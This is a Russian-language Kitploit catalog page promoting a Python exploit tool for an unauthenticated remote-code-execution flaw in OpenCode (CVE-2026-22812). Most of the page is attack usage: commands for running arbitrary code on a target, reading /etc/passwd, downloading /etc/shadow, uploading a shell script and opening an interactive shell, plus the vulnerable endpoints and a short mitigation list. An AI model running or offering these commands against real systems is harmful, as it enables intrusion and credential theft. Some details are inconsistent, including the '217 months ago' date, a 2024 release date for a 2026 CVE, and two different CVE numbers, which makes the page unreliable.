Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2026-22812 — Python-эксплойт-инструмент для OpenCode RCE (CVE-2026-22812), обеспечивающий выполнение команд, чтение/запись/загрузку/скачивание файлов и интерактивную оболочку для авторизованного тестирования на проникновение. | Kitploit
Инструменты/GitHubGitHub/0xgh057r3c0n/cve-2026-22812
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеКомандование и УправлениеИнструмент Удаленного Доступа
GitHub0xgh057r3c0n/cve-2026-22812

CVE-2026-22812

Python-эксплойт-инструмент для OpenCode RCE (CVE-2026-22812), обеспечивающий выполнение команд, чтение/запись/загрузку/скачивание файлов и интерактивную оболочку для авторизованного тестирования на проникновение.

Репозиторий
217 месяцев назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2026-22812

Обзор

Инструмент эксплуатации на Python для уязвимости удалённого выполнения кода (RCE) в OpenCode, затрагивающей версии < v1.0.216. Инструмент предоставляет несколько векторов атаки, включая выполнение команд, чтение/запись файлов, загрузку/скачивание файлов и интерактивную оболочку.

Предупреждение

⚠️ ТОЛЬКО ДЛЯ АВТОРИЗОВАННОГО ТЕСТИРОВАНИЯ ⚠️

  • Этот инструмент предназначен исключительно для легитимного тестирования безопасности и авторизованного тестирования на проникновение
  • Используйте только на системах, которыми вы владеете или на тестирование которых имеете явное разрешение
  • Автор не несёт ответственности за любое неправомерное использование или ущерб, причинённый этим инструментом
  • Несанкционированный доступ к компьютерным системам незаконен и наказывается по закону

Возможности

  • Обнаружение уязвимости: Проверка, уязвима ли цель
  • Выполнение команд: Выполнение произвольных команд на цели
  • Операции с файлами: Чтение, запись, загрузка и скачивание файлов
  • Интерактивная оболочка: Полноценная интерактивная оболочка с автодополнением по табуляции
  • Разведка системы: Сбор информации о системе
  • Поддержка прокси: Маршрутизация трафика через HTTP-прокси
  • Отслеживание статистики: Мониторинг действий по эксплуатации

Установка

root@kitploit:~
# Клонирование репозитория
git clone https://github.com/0xgh057r3c0n/CVE-2026-22812.git
cd CVE-2026-22812

# Установка зависимостей
pip install requests urllib3

# Сделать исполняемым (необязательно)
chmod +x CVE-2026-22812.py

Требования

  • Python 3.6+
  • Библиотека requests
  • Библиотека urllib3

Использование

root@kitploit:~
python3 CVE-2026-22812.py -t http://target:port [options]

Базовые примеры

root@kitploit:~
# Проверка, уязвима ли цель
python3 exploit.py -t http://10.0.0.1:4096 --check

# Интерактивная оболочка
python3 exploit.py -t http://10.0.0.1:4096 -i

# Выполнение одной команды
python3 exploit.py -t http://10.0.0.1:4096 -c "id"

# Чтение файла
python3 exploit.py -t http://10.0.0.1:4096 -r /etc/passwd

# Загрузка файла
python3 exploit.py -t http://10.0.0.1:4096 --upload shell.sh /tmp/shell.sh

# Скачивание файла
python3 exploit.py -t http://10.0.0.1:4096 --download /etc/shadow shadow.txt

# Получение информации о системе
python3 exploit.py -t http://10.0.0.1:4096 --info

# Использование прокси (Burp Suite и т.д.)
python3 exploit.py -t http://10.0.0.1:4096 -c "whoami" --proxy http://127.0.0.1:8080

Команды интерактивной оболочки

Находясь в интерактивной оболочке (флаг -i), вы можете использовать:

root@kitploit:~
<command>                   Выполнить команду оболочки
help                       Показать меню справки
exit                       Выйти из оболочки
session                    Показать идентификатор сессии
stats                      Показать статистику эксплуатации
read <file>                Прочитать содержимое файла
download <remote> <local>  Скачать файл
upload <local> <remote>    Загрузить файл
sysinfo                    Получить информацию о системе

Сведения об уязвимости

  • Идентификатор CVE: CVE-2026-22812 / CVE-2026-22182
  • Продукт: OpenCode
  • Затронутые версии: < v1.0.216
  • Тип уязвимости: Удалённое выполнение кода
  • Вектор атаки: Сеть
  • Аутентификация: Не требуется

Технические детали

Уязвимость существует в конечной точке управления сессиями (/session), которая позволяет неаутентифицированным пользователям создавать сессии и выполнять произвольные команды через конечную точку /session/{id}/shell.

Используемые конечные точки:

  1. POST /session — Создание сессии
  2. POST /session/{id}/shell — Выполнение команд
  3. GET /file/content — Чтение файлов

Меры по устранению

  1. Обновите OpenCode до версии ≥ v1.0.216
  2. Внедрите надлежащую аутентификацию и авторизацию
  3. Ограничьте сетевой доступ к экземплярам OpenCode
  4. Внедрите проверку и очистку входных данных
  5. Используйте межсетевой экран для веб-приложений (WAF)

Структура кода

root@kitploit:~
CVE-2026-22812.py
├── Класс Colors (коды ANSI-цветов)
├── print_banner() (Отображение баннера)
├── Класс Exploit (Основная логика эксплуатации)
│   ├── __init__() (Инициализация)
│   ├── check_vuln() (Проверка уязвимости)
│   ├── create_session() (Создание сессии)
│   ├── exec_cmd() (Выполнение команды)
│   ├── read_file() (Чтение файла)
│   ├── write_file() (Запись файла)
│   ├── upload() (Загрузка файла)
│   ├── download() (Скачивание файла)
│   ├── get_info() (Информация о системе)
│   ├── shell() (Интерактивная оболочка)
│   └── Вспомогательные методы
└── main() (Разбор аргументов)

Лицензия

Этот инструмент выпущен исключительно в образовательных целях. Используйте на свой страх и риск.

Автор

  • GitHub: 0xgh057r3c0n
  • Инструмент: Инструмент эксплуатации CVE-2026-22812

Участие в разработке

  1. Сделайте форк репозитория
  2. Создайте ветку для новой функции
  3. Зафиксируйте свои изменения
  4. Отправьте изменения в ветку
  5. Создайте запрос на включение изменений (Pull Request)

Благодарности

  • Исследователям безопасности, обнаружившим уязвимость
  • Сообществу открытого исходного кода
  • Всем участникам и тестировщикам

Ссылки

  • Консультация по безопасности OpenCode
  • База данных CVE
  • Запись в NVD

Поддержка

По вопросам и проблемам, пожалуйста:

  1. Проверьте существующие проблемы на GitHub
  2. Создайте новую проблему с подробным описанием
  3. Укажите URL цели (если возможно) и сообщения об ошибках

История версий

  • v1.0.0 (2024-01-20): Первоначальный выпуск
    • Обнаружение уязвимости
    • Выполнение команд
    • Операции с файлами
    • Интерактивная оболочка
    • Поддержка прокси
Скачать инструмент